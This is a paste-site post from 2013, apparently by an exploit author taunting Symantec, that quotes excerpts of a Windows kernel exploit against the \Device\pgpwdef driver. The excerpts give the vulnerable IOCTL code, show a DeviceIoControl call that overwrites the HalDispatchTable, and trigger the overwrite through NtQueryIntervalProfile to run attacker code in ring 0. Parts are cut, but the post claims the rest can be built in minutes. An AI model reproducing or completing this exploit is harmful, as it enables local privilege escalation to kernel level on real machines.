Proof for "security" engineers from Symantec

a guest
Jan 5th, 2013

Cut from my exploit, if you are not n00b - you will craft exploit in minutes, see this:
http://www.exploit-db.com/author/?a=2978

Cut:

#define IO_CONTROL_VULN 0x80022058

#define TARGET_DEVICE L"\\Device\\pgpwdef"

[..]

usName.Buffer = TARGET_DEVICE;
usName.Length = usName.MaximumLength = (USHORT)(wcslen(usName.Buffer) * sizeof(WCHAR));

InitializeObjectAttributes(&ObjAttr, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);

// get handle of target device
ns = f_NtOpenFile(
    &hDev,
    FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
    &ObjAttr,
    &StatusBlock,
    FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
    FILE_SYNCHRONOUS_IO_NONALERT
);

[..]

BOOL bStatus = DeviceIoControl(
    hDev,
    IO_CONTROL_VULN,
    InBuff, 0x8,
    OutBuff, 0x8,
    &dwReturnLen, NULL
);

dwReturnLen = 0;
bStatus = DeviceIoControl(
    hDev,
    IO_CONTROL_VULN,
    InBuff, sizeof(PVOID),
    (PUCHAR)m_HalDispatchTable, 0,
    &dwReturnLen, NULL
);

[..]

f_NtQueryIntervalProfile(ProfileTotalIssues, &Interval);

[..]

Your evil code processes with CPL==0